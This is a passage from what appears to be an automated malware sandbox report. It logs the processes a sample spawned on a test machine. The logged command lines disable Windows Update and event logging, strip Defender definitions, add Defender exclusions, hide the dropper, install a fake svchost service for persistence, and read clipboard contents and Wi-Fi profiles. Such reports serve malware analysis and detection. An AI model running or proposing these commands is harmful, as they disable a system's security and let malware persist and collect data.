Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff690e90000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	15:01:14
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7760, Parent PID: 7744

General

Target ID:	29
Start time:	15:01:14
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	15:01:14
Start date:	07/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff690e90000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	15:01:15
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	15:01:15
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop UsoSvc
Imagebase:	0x7ff7f5270000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	15:01:15
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	15:01:15
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	15:01:15
Start date:	07/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff788110000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase:	0x7ff7f5270000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop wuauserv
Imagebase:	0x7ff7f5270000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe""
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop bits
Imagebase:	0x7ff7f5270000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"
Imagebase:	0x7ff6a0500000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop dosvc
Imagebase:	0x7ff7f5270000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:	0x7ff60da80000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:	0x7ff60da80000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:	0x7ff60da80000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase:	0x7ff60da80000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe delete "NPYIAYNC"
Imagebase:	0x7ff7f5270000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	15:01:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto"
Imagebase:	0x7ff7f5270000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:	0x7ff6d4590000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7184, Parent PID: 1420

General

Target ID:	62
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6988, Parent PID: 7400

General

Target ID:	63
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop eventlog
Imagebase:	0x7ff7f5270000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: sc.exePID: 7604, Parent PID: 3716

General

Target ID:	69
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe start "NPYIAYNC"
Imagebase:	0x7ff7f5270000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff774ad0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	15:01:17
Start date:	07/01/2025
Path:	C:\ProgramData\Microsoft\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\Microsoft\svchost.exe
Imagebase:	0x7ff6c6b90000
File size:	5'264'896 bytes
MD5 hash:	C289921058A4B38BDBD1373A0CBB757D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	15:01:18
Start date:	07/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6d1340000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	15:01:18
Start date:	07/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff774ad0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	15:01:18
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	15:01:18
Start date:	07/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff774ad0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	15:01:18
Start date:	07/01/2025
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff670b50000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	15:01:18
Start date:	07/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff690e90000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	15:01:18
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	15:01:18
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	15:01:19
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	15:01:19
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	15:01:19
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7180, Parent PID: 8188

General

Target ID:	92
Start time:	15:01:20
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	93
Start time:	15:01:20
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Imagebase:	0x7ff7b3670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	15:01:20
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
